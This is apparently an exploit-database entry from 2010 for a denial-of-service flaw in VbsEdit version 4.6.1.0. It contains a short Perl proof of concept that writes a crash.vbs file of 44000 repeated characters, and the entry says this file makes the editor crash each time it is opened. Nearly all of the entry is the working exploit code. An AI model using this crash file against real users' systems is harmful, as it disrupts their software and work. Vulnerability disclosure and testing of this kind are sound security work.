VbsEdit version 4.6.1.0 suffers from a denial of service vulnerability.
a18f68029f90dc5f486030cae38a5be40e66215d1d2347495ccd37fe8f3716af
# Exploit Title: VbsEdit v4.6.1.0 DoS
# Date: 8 / 12 / 2010
# Author: C G Tan
# Software Link: https://www.vbsedit.com/tr_download.asp
# Version: v4.6.1.0 32-bit Version
# Tested on: Windows XP SP 2, Windows XP SP 3
# CVE : N / A
# Description : This is the latest version from the official website.
#!/usr/bin/perl
#Opening crash.vbs in VbsEdit will cause VbsEdit to crash consistently.
open FILE, ">crash.vbs";
print FILE 'a'x44000;
close FILE;